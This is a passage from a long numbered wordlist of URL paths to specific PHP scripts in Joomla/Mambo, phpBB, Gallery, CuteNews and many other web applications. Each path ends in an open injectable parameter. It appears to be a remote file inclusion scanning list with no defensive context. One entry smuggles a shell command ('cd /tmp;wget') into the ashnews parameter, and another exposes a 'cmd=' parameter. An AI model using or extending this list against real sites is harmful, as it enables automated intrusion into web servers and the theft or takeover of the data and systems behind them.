  8371. /forums/includes/kb_constants.php?module_root_path=
  8372. /agenda.php3?rootagenda=
  8373. /agenda2.php3?rootagenda=
  8374. /toplist/sources/lostpw.php?CONFIG[path]=
  8375. /topsite/sources/join.php?CONFIG[path]=
  8376. /extras/poll/poll.php?file_newsportal=
  8377. /modules/TotalCalendar/index.php?inc_dir=
  8378. /calendar/embed/day.php?path=
  8379. /pafiledb/includes/pafiledb_constants.php?module_root_path=
  8380. /apc-aa/cached.php3?GLOBALS[AA_INC_PATH]=
  8381. /eqdkp/includes/dbal.php?eqdkp_root_path=
  8382. /dkp/includes/dbal.php?eqdkp_root_path=
  8383. /topsites/config.php?returnpath=
  8384. /manager/frontinc/prepend.php?_PX_config[manager_path]=
  8385. /forum/addpost_newpoll.php?thispath=
  8386. /forums/addpost_newpoll.php?thispath=
  8387. /forums/ubbt.inc.php?thispath=
  8388. /includes/orderSuccess.inc.php?glob[rootDir]=
  8389. /stats.php?dir[func]=dir[base]=
  8390. /ladder/stats.php?dir[base]=
  8391. /vwar/admin/admin.php?vwar_root=
  8392. /modules/vWar_Account/includes/get_header.php?vwar_root=
  8393. /modules/vWar_Account/includes/functions_common.php?vwar_root2=
  8394. /forum/impex/ImpExData.php?systempath=
  8395. /cgi-bin//classes/adodbt/sql.php?classes_dir=
  8396. /cgi-bin/install/index.php?G_PATH=
  8397. /includes/class_template.php?quezza_root_path=
  8398. /bazar/classified_right.php?language_dir=
  8399. /classified_right.php?language_dir=
  8400. /modules/center/admin/accounts/process.php?module_path]=
  8401. /bbs/include/write.php?dir=
  8402. /forum/include/common.php?pun_root=
  8403. /vuln.php?=
  8404. /cgi-bin//include/write.php?dir=
  8405. /index.php?pagina=
  8406. /phpcoin/config.php?_CCFG[_PKG_PATH_DBSE]=
  8407. /quick_reply.php?phpbb_root_path=
  8408. /PATH/admin/plog-admin-functions.php?configbasedir=
  8409. /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=
  8410. /index2.php?includes_dir=
  8411. /phpWebLog/include/init.inc.php?G_PATH=
  8412. /block.php?Include=
  8413. /arpuivo.php?data=
  8414. /path_to_gallery/setup/index.php?GALLERY_BASEDIR=
  8415. /index.php?[Home]=
  8416. /path_to_script/block.php?Include=
  8417. /PHPNews/auth.php?path=
  8418. /include/print_category.php?dir=
  8419. /skin/zero_vote/login.php?dir=
  8420. /skin/zero_vote/ask_password.php?dir=
  8421. /email.php?login=cer_skin=
  8422. /loginout.php?cutepath=
  8423. /skin/zero_vote/error.php? dir=
  8424. /admin_modules/admin_module_delcomments.inc.php?config[path_src_include]=
  8425. /admin_modules/admin_module_delimage.inc.php?config[path_src_include]=
  8426. /src/index_overview.inc.php?config[path_src_include]=
  8427. /src/index_image.inc.php?config[path_src_include]=
  8428. /yappa-ng/src/index_overview.inc.php?config[path_src_include]=
  8429. /src/image-gd.class.php?config[path_src_include]=
  8430. /src/image.class.php?config[image_module]=
  8431. /src/show_random.inc.php?config[path_src_include]=
  8432. /src/main.inc.php?config[path_src_include]=
  8433. /includes/session.php?baseDir=
  8434. /modules/projects/gantt.php?dPconfig[root_dir]=
  8435. /modules/projects/gantt2.php?dPconfig[root_dir]=
  8436. /modules/admin/vw_usr_roles.php?baseDir=
  8437. /modules/public/date_format.php?baseDir=
  8438. /modules/tasks/gantt.php?baseDir=
  8439. /phpgedview/help_text_vars.php?PGV_BASE_DIRECTORY=
  8440. /bug_sponsorship_list_view_inc.php?t_core_path=
  8441. /includes/setup.php?phpc_root_path=
  8442. /phpBB/admin/admin_styles.php?mode=
  8443. /admin/lang.php?CMS_ADMIN_PAGE=
  8444. /CubeCart/includes/orderSuccess.inc.php?&glob[rootDir]=
  8445. /include/init.inc.php?G_PATH=
  8446. /modules/newbb_plus/class/class.forumposts.php?bbPath[path]=
  8447. /protection.php?siteurl=
  8448. /htmltonuke.php?filnavn=
  8449. /mail_autocheck.php?pm_path=
  8450. /include/new-visitor.inc.php?lvc_include_dir=
  8451. /path_of_cpcommerce/_functions.php?prefix=
  8452. /community/modules/agendax/addevent.inc.php?agendax_path=
  8453. /zentrack/index.php?configFile=
  8454. /myPHPCalendar/admin.php?cal_dir=
  8455. /phpGedView/individual.php?PGV_BASE_DIRECTORY=
  8456. /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=
  8457. /cgi-bin//admin.php?cal_dir=
  8458. /gallery/captionator.php?GALLERY_BASEDIR=
  8459. /expanded.php?conf=
  8460. /mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=
  8461. /pollvote/pollvote.php?pollname=
  8462. /displayCategory.php?basepath=
  8463. /phpBB2/admin/admin_cash.php?phpbb_root_path=
  8464. /modules/foro/includes/functions_admin.php?phpbb_root_path=
  8465. /modules/Forums/admin/admin_smilies.php?phpEx=
  8466. /modules/Forums/admin/admin_board.php?phpEx=
  8467. /webcalendar/tools/send_reminders.php?includedir=
  8468. /step_one.php?server_inc=
  8469. /upgrade_album.php?GALLERY_BASEDIR=
  8470. /wagora/extras//quicklist.php?site=
  8471. /secure.php?cfgProgDir=
  8472. /modules/My_eGallery/public//inc/?HCL_path=
  8473. /adlayer.php?layerstyle=
  8474. /Forums/bb_smilies.php?name=
  8475. /modules/Forums/bb_smilies.php?name=
  8476. /gadgets/Blog/BlogModel.php?path=
  8477. /learnlinc/clmcpreload.php?CLPATH=
  8478. /modernbill/samples/news.php?DIR=
  8479. /religions/faq.php?page=
  8480. /phpatm/index.php?include_location=
  8481. /shannen/index.php?x=
  8482. /main.php?left=
  8483. /nucleus/libs/globalfunctions.php?DIR_LIBS=
  8484. /show_archives.php?cutepath=
  8485. /magicforum/misc.php?action=
  8486. /local/investing_industrialeastate1.php?a=
  8487. /modules/coppermine/themes/default/theme.php?THEME_DIR
  8488. /include/footer.inc.php?_AMLconfig[cfg_serverpath]=
  8489. /modules/module_db.php?pivot_path=
  8490. /cgi-bin/calendar.pl?fromTemplate=
  8491. /live/inc/pipe.php?HCL_path=
  8492. /cgi-bin/awstats.pl?logfile=
  8493. /presse/stampa.php3?azione=
  8494. /captionator.php?GALLERY_BASEDIR=
  8495. /achievo/atk/javascript/class.atkdateattribute.js.php?config_atkroot=
  8496. /gallery/captionator.php?GALLERY_BASEDIR=.example.com
  8497. /globals.php3?LangCookie=.example.com
  8498. /include/postgres.php?inc_dir=
  8499. /include/postgres65.php?inc_dir=
  8500. /mantis/login_page.php?g_meta_inc_dir=
  8501. /user/agora_user.php?inc_dir=
  8502. /userlist.php?ME=.example.com
  8503. /cpcommerce/_functions.php?prefix=
  8504. /ashnews.php?pathtoashnews=cd /tmp;wget
  8505. /eblog/blog.inc.php?xoopsConfig[xoops_url]=
  8506. /includes/include_once.php?include_file=
  8507. /modules.php?name=jokeid=
  8508. /livehelp/inc/pipe.php?HCL_path=
  8509. /support/faq/inc/pipe.php?HCL_path=
  8510. /gnu/index.php?doc=
  8511. /phpgwapi/setup/tables_update.inc.php?appdir=
  8512. /includes/calendar.php?phpc_root_path=
  8513. /web_statistics//skin/zero_vote/error.php?dir=
  8514. /web_statistics//coppercop/theme.php?THEME_DIR=
  8515. /nphp/nphpd.php?nphp_config[LangFile]=
  8516. /demo/includes/init.php?user_inc=
  8517. /jaf/index.php?show=
  8518. /sources/post.php?fil_config=
  8519. /bb_lib/checkdb.inc.php?libpach=
  8520. /include/livre_include.php?chem_absolu=
  8521. /derniers_commentaires.php?rep=
  8522. /allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=
  8523. /calendar/calendar.php?serverPath=
  8524. /calendar/events/header.inc.php?serverPath=
  8525. /calendar/setup/setupSQL.php?serverPath=
  8526. /install/index.php?G_PATH=
  8527. /support/mailling/maillist/inc/initdb.php?absolute_path=
  8528. /coppercop/theme.php?THEME_DIR=
  8529. /dotproject/modules/projects/addedit.php?root_dir=
  8530. /dotproject/modules/projects/view.php?root_dir=
  8531. /phpshop/index.php?base_dir=
  8532. /contacts.php?cal_dir=
  8533. /stats/modules/My_eGallery/index.php?basepath=
  8534. /stats/include/write.php?dir=
  8535. /stats/tools/send_reminders.php?includedir=
  8536. /index.cgiupgrade_album.php?GALLERY_BASEDIR=
  8537. /pollvote/pollvote.php?pollname
  8538. /includes/page_header.php?dir=
  8539. /shoutbox/expanded.php?conf=
  8540. /library/editor/editor.php?root=
  8541. /index.php?pg=
  8542. /index.php?s=
  8543. /index.php?cont=
  8544. /links.php?c=
  8545. /list.php?c=
  8546. /user.php?xoops_redirect=
  8547. /r.php?url=
  8548. /index.php?m=
  8549. /index.php?id=
  8550. /index.php/main.php?x=
  8551. /index.php?include=
  8552. /index.php?content=
  8553. /index.php?p=
  8554. /index.php?open=
  8555. /index.php?cat=
  8556. /index.php?meio=
  8557. /index.php?site=
  8558. /index2.php?content=
  8559. /index.php?conteudo=
  8560. /index.php?meio.php=
  8561. /index.php?file=
  8562. /visitorupload.php?cmd=
  8563. /application.php?base_path=
  8564. /config.php?returnpath=
  8565. /editsite.php?returnpath=
  8566. /in.php?returnpath=
  8567. /addsite.php?returnpath=
  8568. /index.php?site_path=
  8569. /mail/index.php?site_path=
  8570. /index.php?inc_dir=
  8571. /index.php?theme_path=
  8572. /index.php?f=
  8573. /index.php?act=
  8574. /become_editor.php?theme_path=
  8575. /add.php?theme_path=
  8576. /bad_link.php?theme_path=
  8577. /fav.php?theme_path=
  8578. /get_rated.php?theme_path=
  8579. /login.php?theme_path=
  8580. /mailing_list.php?theme_path=
  8581. /modify.php?theme_path=
  8582. /pick.php?theme_path=
  8583. /rss.php?theme_path=
  8584. /send_pwd.php?theme_path=
  8585. /sendmail.php?theme_path=
  8586. /tell_friend.php?theme_path=
  8587. /top_rated.php?theme_path=
  8588. /user_detail.php?theme_path=
  8589. /user_search.php?theme_path=
  8590. /invoice.php?base_path=
  8591. /armygame.php?libpath=
  8592. /lire.php?rub=
  8593. /pathofhostadmin/?page=
  8594. /index2.php?mosConfig_absolute_path=
  8595. /mainbody.php?mosConfig_absolute_path=
  8596. /offline.php?mosConfig_absolute_path=
  8597. /pathway.php?mosConfig_absolute_path=
  8598. /administrator/components/com_banners/toolbar.banners.html.php?mosConfig_absolute_path=
  8599. /administrator/components/com_banners/toolbar.banners.php?mosConfig_absolute_path=
  8600. /administrator/components/com_checkin/admin.checkin.php?mosConfig_absolute_path=
  8601. /administrator/components/com_config/admin.config.html.php?mosConfig_absolute_path=
  8602. /administrator/components/com_config/admin.config.php?mosConfig_absolute_path=
  8603. /administrator/components/com_config/toolbar.config.html.php?mosConfig_absolute_path=
  8604. /administrator/components/com_config/toolbar.config.php?mosConfig_absolute_path=
  8605. /administrator/components/com_frontpage/admin.frontpage.html.php?mosConfig_absolute_path=
  8606. /administrator/components/com_frontpage/admin.frontpage.php?mosConfig_absolute_path=
  8607. /administrator/components/com_frontpage/toolbar.frontpage.html.php?mosConfig_absolute_path =
  8608. /administrator/components/com_languages/admin.languages.html.php?mosConfig_absolute_path=
  8609. /administrator/components/com_languages/admin.languages.php?mosConfig_absolute_path=
  8610. /administrator/components/com_languages/toolbar.languages.html.php?mosConfig_absolute_path =
  8611. /administrator/components/com_languages/toolbar.languages.php?mosConfig_absolute_path=
  8612. /administrator/components/com_massmail/admin.massmail.html.php?mosConfig_absolute_path=
  8613. /administrator/components/com_massmail/toolbar.massmail.html.php?mosConfig_absolute_path=
  8614. /administrator/components/com_media/admin.media.php?mosConfig_absolute_path=
  8615. /administrator/components/com_media/toolbar.media.php?mosConfig_absolute_path=
  8616. /administrator/components/com_menus/admin.menus.html.php?mosConfig_absolute_path=
  8617. /administrator/components/com_menus/components/components.class.php?mosConfig_absolute_path=
  8618. /administrator/components/com_menus/components/components.menu.html.php?mosConfig_absolute_path=
  8619. /administrator/components/com_menus/content_archive_category/content_archive_category.class.php?mosConfig_absol ute_path=
  8620. /administrator/components/com_menus/content_archive_section/content_archive_section.class.php?mosConfig_absolu te_path=
  8621. /administrator/components/com_menus/content_blog_category/content_blog_category.class.php?mosConfig_absolute _path=
  8622. /administrator/components/com_menus/content_blog_category/content_blog_category.menu.html.php?mosConfig_abso lute_path=
  8623. /administrator/components/com_menus/content_blog_section/content_blog_section.menu.html.php?mosConfig_absol ute_path=
  8624. /administrator/components/com_menus/content_category/content_category.class.php?mosConfig_absolute_path =
  8625. /administrator/components/com_menus/content_section/content_section.class.php?mosConfig_absolute_path=
  8626. /administrator/components/com_menus/content_typed/content_typed.menu.php?mosConfig_absolute_path=
  8627. /administrator/components/com_menus/separator/separator.menu.html.php?mosConfig_absolute_path=
  8628. /administrator/components/com_menus/toolbar.menus.html.php?mosConfig_absolute_path=
  8629. /administrator/components/com_menus/toolbar.menus.php?mosConfig_absolute_path=
  8630. /administrator/components/com_menus/url/url.menu.php?mosConfig_absolute_path=
  8631. /administrator/components/com_messages/admin.messages.php?mosConfig_absolute_path=
  8632. /administrator/components/com_newsfeeds/admin.newsfeeds.html.php?mosConfig_absolute_path=
  8633. /administrator/components/com_newsfeeds/admin.newsfeeds.php?mosConfig_absolute_path=
  8634. /administrator/components/com_newsfeeds/newsfeeds.class.php?mosConfig_absolute_path=
  8635. /administrator/components/com_newsfeeds/toolbar.newsfeeds.html.php?mosConfig_absolute_path =
  8636. /administrator/components/com_newsfeeds/toolbar.newsfeeds.php?mosConfig_absolute_path=
  8637. /administrator/components/com_poll/toolbar.poll.html.php?mosConfig_absolute_path=
  8638. /administrator/components/com_poll/toolbar.poll.php?mosConfig_absolute_path=
  8639. /administrator/components/com_sections/admin.sections.php?mosConfig_absolute_path=
  8640. /administrator/components/com_sections/toolbar.sections.html.php?mosConfig_absolute_path=
  8641. /administrator/components/com_statistics/admin.statistics.html.php?mosConfig_absolute_path=
  8642. /administrator/components/com_statistics/admin.statistics.php?mosConfig_absolute_path=
  8643. /administrator/components/com_templates/admin.templates.html.php?mosConfig_absolute_path=
  8644. /administrator/components/com_templates/admin.templates.php?mosConfig_absolute_path=
  8645. /administrator/components/com_templates/toolbar.templates.html.php?mosConfig_absolute_path =
  8646. /administrator/components/com_templates/toolbar.templates.php?mosConfig_absolute_path=
  8647. /administrator/components/com_users/toolbar.users.php?mosConfig_absolute_path=
  8648. /administrator/components/com_weblinks/admin.weblinks.html.php?mosConfig_absolute_path=
  8649. /administrator/components/com_weblinks/admin.weblinks.php?mosConfig_absolute_path=
  8650. /administrator/images/archive.png?mosConfig_absolute_path=
  8651. /administrator/images/archive_f2.png?mosConfig_absolute_path=
  8652. /administrator/images/back_f2.png?mosConfig_absolute_path=
  8653. /administrator/images/css.png?mosConfig_absolute_path=
  8654. /administrator/images/css_f2.png?mosConfig_absolute_path=
  8655. /administrator/images/delete.png?mosConfig_absolute_path=
  8656. /administrator/images/help_f2.png?mosConfig_absolute_path=
  8657. /administrator/images/html.png?mosConfig_absolute_path=
  8658. /administrator/images/html_f2.png?mosConfig_absolute_path=
  8659. /administrator/images/new_f2.png?mosConfig_absolute_path=
  8660. /administrator/images/publish.png?mosConfig_absolute_path=
  8661. /administrator/images/publish_g.png?mosConfig_absolute_path=
  8662. /administrator/images/publish_r.png?mosConfig_absolute_path=
  8663. /administrator/images/unarchive.png?mosConfig_absolute_path=
  8664. /administrator/images/unpublish.png?mosConfig_absolute_path=
  8665. /administrator/images/upload.png?mosConfig_absolute_path=
  8666. /administrator/images/upload_f2.png?mosConfig_absolute_path=
  8667. /administrator/includes/pageNavigation.php?mosConfig_absolute_path=
  8668. /administrator/index.php?mosConfig_absolute_path=
  8669. /administrator/index3.php?mosConfig_absolute_path=
  8670. /administrator/logout.php?mosConfig_absolute_path=
  8671. /administrator/popups/modulewindow.php?mosConfig_absolute_path=
  8672. /administrator/popups/pollwindow.php?mosConfig_absolute_path=
  8673. /components/com_banners/banners.php?mosConfig_absolute_path=
  8674. /components/com_contact/contact.class.php?mosConfig_absolute_path=
  8675. /components/com_contact/contact.html.php?mosConfig_absolute_path=
  8676. /components/com_content/content.html.php?mosConfig_absolute_path=
  8677. /components/com_frontpage/frontpage.php?mosConfig_absolute_path=
  8678. /components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php ?mosConfig_absolute_path=
  8679. /components/com_htmlarea3_xtd-c/popups/InsertFile/config.inc.php ?mosConfig_absolute_path=
  8680. /components/com_htmlarea3_xtd-c/popups/InsertFile/main.php ?mosConfig_absolute_path=
  8681. /components/com_htmlarea3_xtd-c/popups/insert_table.php ?mosConfig_absolute_path=
  8682. /components/com_htmlarea3_xtd-c/popups/select_character.php ?mosConfig_absolute_path=
  8683. /components/com_login/login.php?mosConfig_absolute_path=
  8684. /components/com_poll/poll.html.php?mosConfig_absolute_path=
  8685. /components/com_registration/registration.php?mosConfig_absolute_path=
  8686. /components/com_rss/rss.php?mosConfig_absolute_path=
  8687. /components/com_user/user.html.php?mosConfig_absolute_path=
  8688. /components/com_weblinks/weblinks.class.php?mosConfig_absolute_path=
  8689. /components/com_weblinks/weblinks.html.php?mosConfig_absolute_path=
  8690. /components/com_weblinks/weblinks.php?mosConfig_absolute_path=
  8691. /editor/editor.php?mosConfig_absolute_path=
  8692. /editor/htmlarea3_xtd15/popups/InsertFile/config.inc.php?mosConfig_absolute_path=
  8693. /includes/HTML_toolbar.php?mosConfig_absolute_path=
  8694. /includes/agent_browser.php?mosConfig_absolute_path=
  8695. /includes/agent_os.php?mosConfig_absolute_path=
  8696. /includes/footer.php?mosConfig_absolute_path=
  8697. /includes/frontend.html.php?mosConfig_absolute_path=
  8698. /includes/metadata.php?mosConfig_absolute_path=
  8699. /language/english.ignore.php?mosConfig_absolute_path=
  8700. /language/english.php?mosConfig_absolute_path=
  8701. /language/english.xml?mosConfig_absolute_path=
  8702. /modules/mod_mainmenu.php?mosConfig_absolute_path=
  8703. /modules/mod_mostread.php?mosConfig_absolute_path=
  8704. /modules/mod_poll.php?mosConfig_absolute_path=
  8705. /modules/mod_rssfeed.php?mosConfig_absolute_path=
  8706. /modules/mod_sections.php?mosConfig_absolute_path=
  8707. /modules/mod_stats.php?mosConfig_absolute_path=
  8708. /modules/mod_templatechooser.php?mosConfig_absolute_path=
  8709. /core/index/index_album.php?P_LIB=
  8710. /classes/class_mail.inc.php?path_to_folder=
  8711. /includes/class_template.php?phpbb_root_path=
  8712. /lib/exifer/exif.php?lib_path?=
  8713. /index.php?rootpath=
  8714. /ezconvert/config.php?ezconvert_dir=
  8715. /UserMan/controller/common.function.php?level=
  8716. /lang/leslangues.php?fichier=
  8717. /gallery/theme/include_mode/template.php?galleryfilesdir=
  8718. /includes/functions.php?phpbb_root_path=
  8719. /include/debug.php?config[debug]=
  8720. /xt_counter.php?server_base_dir=
  8721. /system/lib/package.php?gl_root=
  8722. /ains_main.php?ains_path=
  8723. /vp/configure.php?phpbb_root_path=
  8724. /config.php?sql_language=
  8725. /admin/admin_board.php?phpbb_root_path=
  8726. /admin/admin_attachments.php?phpbb_root_path=
  8727. /admin/admin_users.php?phpbb_root_path=
  8728. /lib/selectlang.php?BBC_LANGUAGE_PATH=
  8729. /include/dom.php?path=
  8730. /defines.php?WEBCHATPATH=
  8731. /include/config.inc.php?racine=
  8732. /lib/nl/nl.php?g_strRootDir=
  8733. /up.php?my[root]=
  8734. /libraries/grab_globals.lib.php?inc_dir=
  8735. /frontpage.php?setup_folder=
  8736. /lang/index.php?file=
  8737. /show.php?PollDir=
  8738. /include/common.php?env[rootPath]=
  8739. /include/forms.php?INCLUDE_DIR=
  8740. /include/issue_edit.php?INCLUDE_DIR=
  8741. /include/client.php?INCLUDE_DIR=
  8742. /include/classes.php?INCLUDE_DIR=
  8743. /routines/fieldValidation.php?jssShopFileSystem=
  8744. /config/config_admin.php?INC=
  8745. /config/config_member.php?INC=
  8746. /admini/index.php?INC=
  8747. /paypalipn/ipnprocess.php?INC=
  8748. /members/index.php?INC=
  8749. /members/registration.php?INC=
  8750. /main/ppcbannerclick.php?INC=
  8751. /include/common_function.php?_config[site_path]=
  8752. /comments.php?AMG_serverpath=
  8753. /signin.php?sent=1&AMG_serverpath=
  8754. /index.php?AMV_openconfig=1&AMV_serverpath=
  8755. /index.php?custom_admin_path=
  8756. /archives.php?custom_admin_path=
  8757. /inc/init.inc.php?current_path=
  8758. /bu/bu_cache.php?bu_dir=
  8759. /bridge/enigma/E2_header.inc.php?boarddir=
  8760. /bu/process.php?bu_dir=
  8761. /bu/process.php?bu_config[dir]=
  8762. /headlines.php?CONFIG[script_path]=
  8763. /eventcal/mod_eventcal.php?lm_absolute_path=
  8764. /admin.php?cal_dir=
  8765. /convert-date.php?cal_dir=
  8766. /rss.php?include_path=
  8767. /mediabroadcast.php?include_path=
  8768. /includes/archive/archive_topic.php?phpbb_root_path=
  8769. /gallery.scr.php?GLOBALS[PTH][func]=
  8770. /rss.scr.php?GLOBALS[PTH][classes]=
  8771. /search.scr.php?GLOBALS[PTH][classes]=
  8772. /users.func.php?GLOBALS[PTH][classes]=
  8773. /compteur/mapage.php?chemin=
  8774. /common.inc.php?CFG[libdir]=
  8775. /form_header.php?errormsg=1&CFG[localelangdir]=
  8776. /footer.inc.php?settings[footer]=
  8777. /config/sender.php?ROOT_PATH=
  8778. http://%5Btarget%5D/%5Bpath%5D/include/body.inc.php?menu=
  8779. /include/admin_newcomm.inc.php?action=create&incpath=
  8780. /include/friends.inc.php?action=invite&incpath=
  8781. /include/notify.inc.php?action=sendit&incpath=
  8782. /include/body_admin.inc.php?menu=
  8783. /include/body_admin.inc.php?incpath=?
  8784. /include/comm_post.inc.php?action=post&incpath=
  8785. /admin/index_sitios.php?_VIEW=
  8786. /modules/mx_links/language/lang_english/lang_admin.php?mx_root_path=
  8787. /modules/mx_meeting/pages/meeting_constants.php?module_root_path=
  8788. /member/usercp_menu.php?script_folder=
  8789. /Blog_CMS/admin/plugins/NP_UserSharing.php?DIR_ADMIN=
  8790. /mxBB/modules/kb_mods/includes/kb_constants.php?kb_constants.php&board_config[default_lang]=
  8791. /mxBB/modules/mx_act/include/constants/act_constants.php?mx_root_path=
  8792. /interface.php?basepath=
  8793. /gizzar/index.php?basePath=
  8794. /cm68news/engine/oldnews.inc.php?addpath=
  8795. /inc/shows.inc.php?cutepath=
  8796. /inc/CONTROL/imports/import-mt.php?basepath=foo&inc_path=
  8797. /styles.php?toroot=
  8798. /centre.php?page=
  8799. /addcode.php?hm=
  8800. /includes/admin.php?templatesDirectory=
  8801. /includes/profile.php?GlobalSettings[templatesDirectory]=
  8802. /includes/merge.php?GlobalSettings[templatesDirectory]=
  8803. /includes/adminPolls.php?GlobalSettings[templatesDirectory]=
  8804. /phppc/poll.php?is_phppc_included=1&relativer_pfad=
  8805. /phpquickgallery/gallery_top.inc.php?textFile=
  8806. /core/editor.php?editor_insert_bottom=
  8807. /dsp/dsp_form_booking_ctl.php?apx_root_path=
  8808. /includes/mx_common.php?module_root_path=
  8809. /pageactionauthor.php?DIR=
  8810. /pntUnit/Inspect.php?Include=
  8811. /phpjobschedule_PATH/delete.php?installed_config_file=
  8812. /phpjobschedule_PATH/modify.php?installed_config_file=
  8813. /phpjobschedule_PATH/phpjobscheduler.php?installed_config_file=
  8814. /includes/user_standard.php?relative_root=
  8815. /include/classes/pear/DB/mysqli.php?baseDir=
  8816. /core/core.php?root=
  8817. /work/index.php?g_include=
  8818. /inc/session.php?sessionerror=0&lang=
  8819. /admin/auth/secure.php?cfgProgDir=
  8820. /inc/irayofuncs.php?irayodirhack=
  8821. /dodosmail.php?dodosmail_header_file=
  8822. /dodosmail.php?dodosmail_footer_file=
  8823. /ad_main.php?_mygamefile=
  8824. /sohoadmin/client_files/shopping_cart/pgm-shopping_css.inc.php?_SESSION[docroot_path]=
  8825. /cyberfolio/portfolio/msg/view.php?av=
  8826. /library/translation.inc.php?GLOBALS[srcdir]=
  8827. /lib/includes/loader.cmd.php?store_config=
  8828. /lib/includes/loader.ftp.php?store_config=
  8829. /lib/includes/loader.soap.php?store_config=
  8830. /includes/xhtml.php?d_root=
  8831. /function_log.php?racine=
  8832. /admin/controls/cart.php?_saz[settings][shippingfolder]=
  8833. /manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=
  8834. /admin.php?pb_lang=
  8835. /pbook.php?pb_lang=
  8836. /gepi/gestion/savebackup.php?filename=
  8837. /users/include/body.inc.php?reqpath=
  8838. /users/include/body_blog.inc.php?reqpath=
  8839. /users/include/upload_ht.inc.php?usrinc=
  8840. /faq_reply.php?email=
  8841. /modules/core/html/append.php?PS_BASE=
  8842. /ip.inc.php?type=1&cgipath=
  8843. /mcNews/admin/header.php?skinfile=
  8844. /inc/download_center_lite.inc.php?script_root=
  8845. /lib/armygame.php?libpath=
  8846. /includes/get_header.php?vwar_root=
  8847. /kernel/loadkernel.php?installPath=
  8848. /include/SQuery/gameSpy2.php?libpath=
  8849. /movie_cls.php?full_path=
  8850. /admin/addentry.php?phpbb_root_path=
  8851. /show.php?path=
  8852. /includes/phpdig/includes/config.php?relative_script_path=
  8853. /includes/pafiledb_constants.php?module_root_path=
  8854. /functions.php?path=
  8855. /classes/class_admin.php?PathToComment=
  8856. /classes/class_comments.php?PathToComment=
  8857. /login/secure.php?cfg[homepath]=
  8858. /faq.php?foing_root_path=
  8859. /song.php?foing_root_path=
  8860. /gen_m3u.php?foing_root_path=
  8861. /view_song.php?foing_root_path=
  8862. /login.php?foing_root_path=
  8863. /playlist.php?foing_root_path=
  8864. /admin/main.php?foing_root_path=
  8865. /admin/index.php?foing_root_path=
  8866. /admin/edit_artist.php?foing_root_path=
  8867. /admin/edit_album.php?foing_root_path=
  8868. /admin/config.php?foing_root_path=
  8869. /admin/admin_status.php?foing_root_path=
  8870. /admin/inc/lib/boxes.lib.php?path=
  8871. /mdweb/admin/inc/organisations/form_org.inc.php?chemin_appli=
  8872. /modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path =
  8873. /RR.php?phpdns_basedir=
  8874. /include/myToolBox.tlb.php?SPEEDBERG_PATH=
  8875. /include/scriplet.inc.php?SPEEDBERG_PATH=
  8876. /include/standardPage.tpl.php?SPEEDBERG_PATH=
  8877. /common.php?ezt_root_path=
  8878. /phpcalendar/includes/setup.php?phpc_root_path=
  8879. /inc/mail.php?PROJECT_ROOT=
  8880. /_msdazu_share/richtext/colorpik3.php?path_red2=
  8881. /_msdazu_share/richtext/extras_menu.php?path_red2=
  8882. /_msdazu_share/richtext/farbpalette.php?path_red2=
  8883. /_msdazu_share/richtext/lese_inc.php?path_red2=
  8884. /_msdazu_share/share/insert1.php?path_scr_dat2=
  8885. /_msdazu_share/extras/downloads/index.php?path_red=
  8886. /admin/admin_module.php?g_admin_rep=
  8887. /themes/program/themesettings.inc.php?themesdir=
  8888. /config.inc.php3?rel_path=
  8889. /db/txt.inc.php?file=&check=0&email[to]=
  8890. /index.php?class_path=
  8891. /edit.php?javascript_path=
  8892. /templates/barrel/template.tpl.php?renderer=
  8893. /templates/text-only/template.tpl.php?renderer=
  8894. /templates/slashdot/template.tpl.php?renderer=
  8895. /templates/penguin/template.tpl.php?renderer=
  8896. /templates/pda/template.tpl.php?renderer=
  8897. /templates/nifty/template.tpl.php?renderer=
  8898. /templates/barry/template.tpl.php?renderer=
  8899. /sw/index_sw.php?doc_directory=
  8900. /sw/lib_cart/cart.php?doc_directory=
  8901. /sw/lib_comment/comment.php?doc_directory=
  8902. /template.php?formPage=
  8903. /forum/track.php?path=
  8904. /process.php?DEFAULT_SKIN=
  8905. /template/purpletech/base_include.php?page=
  8906. /common/visiteurs/include/menus.inc.php?lvc_include_dir=
  8907. /include/theme.inc.php?fullpath=
  8908. /include/footer.inc.php?fullpath=
  8909. /modification/SendAlertEmail.php?AGE=
  8910. /community/Offline.php?sourcedir=
  8911. /lib/sqlcompose.lib.php?lib_dir=
  8912. /lib/sqlsearch.lib.php?lib_dir=
  8913. /admin/includes/spaw/spaw_control.class.php?spaw_root=
  8914. /admin.php?Htmls=
  8915. /look.php?Htmls=
  8916. /re.php?Htmls=
  8917. /shoutbox.php?phpbb_root_path=
  8918. /archive.php?scriptpath=
  8919. /comments.php?scriptpath=
  8920. /init.php?scriptpath=
  8921. /news.php?scriptpath=
  8922. /ftag.php?mostrar=
  8923. /param_editor.php?folder=
  8924. /index.php?contentSpecial=
  8925. /getimg.php?img=
  8926. /modules/Calendar/admin/update.php?calpath=
  8927. /sw/lib_up_file/find_file.php?doc_directory=
  8928. /webyep-system/programm/lib/WYApplication.php?webyep_sIncludePath=
  8929. /webyep-system/programm/webyep.php?webyep_sIncludePath=
  8930. /sw/lib_user/find_user.php?doc_directory=
  8931. /sw/lib_user/user.php?doc_directory=
  8932. /sw/lib_session/session.php?doc_directory=
  8933. /include/disp_smileys.php3?cfg_include_dir=
  8934. /include/little_news.php3?cfg_include_dir=
  8935. /includes/functions_num_image.php?phpbb_root_path=
  8936. /includes/functions_user_viewed_posts.php?phpbb_root_path=
  8937. /images/smileys/smileys_packs.php?smileys_dir=
  8938. /index.php?catid=
  8939. /includes/themen_portal_mitte.php?phpbb_root_path=
  8940. /module/forum/main.php?id=1&main_dir=
  8941. /includes/footer.php?PHPGREETZ_INCLUDE_DIR=
  8942. /includes/functions_static_topics.php?phpbb_root_path=
  8943. /functions.php?pmp_rel_path=
  8944. /wamp_dir/setup/yesno.phtml?no_url=
  8945. /change_preferences2.php?target=
  8946. /forum/search.php?repertorylevel=
  8947. /forum/message.php?repertorylevel=
  8948. /forum/forum82lib.php3?repertorylevel=
  8949. /index.php?page=
  8950. /window.php?action=
  8951. /includes/functions_kb.php?phpbb_root_path=
  8952. /include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=
  8953. /sources/myaccount.php?open_box=
  8954. /sources/myaccount.php?middle_box=
  8955. /navigation/search.php?navigation_end=
